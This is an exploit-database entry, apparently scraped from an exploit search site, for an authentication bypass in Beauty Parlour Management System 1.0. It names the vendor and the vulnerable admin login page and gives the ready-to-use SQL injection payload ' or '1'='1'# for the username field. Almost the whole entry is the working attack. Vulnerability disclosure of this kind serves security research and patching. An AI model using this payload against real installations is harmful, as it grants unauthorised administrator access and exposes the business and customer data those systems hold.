Exploit for Beauty Parlour Management System 1.0 SQL Injection

Name: Exploit for Beauty Parlour Management System 1.0 SQL Injection
Rating: 5 (367 reviews)

2020-06-19 | CVSS 0.4

## https://sploitus.com/exploit?id=PACKETSTORM:158148
# Exploit Title: Beauty Parlour Management System 1.0 - Authentication Bypass  
# Google Dork: N/A  
# Exploit Author: Prof. Kailas PATIL (krp)  
# Date: 2020-06-18  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link: https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/  
# Version: v1.0  
# Category: Webapps  
# Tested on: LAMP for Linux  
  
# Description:  
# Password and username parameters have sql injection vulnerability in Admin login panel.  
#   
#------------------------------------------------------  
#   
# Login Link: http://localhost/bpms/admin/index.php  
# username: ' or '1'='1'#   
# password: blah123  
#   
#------------------------------------------------------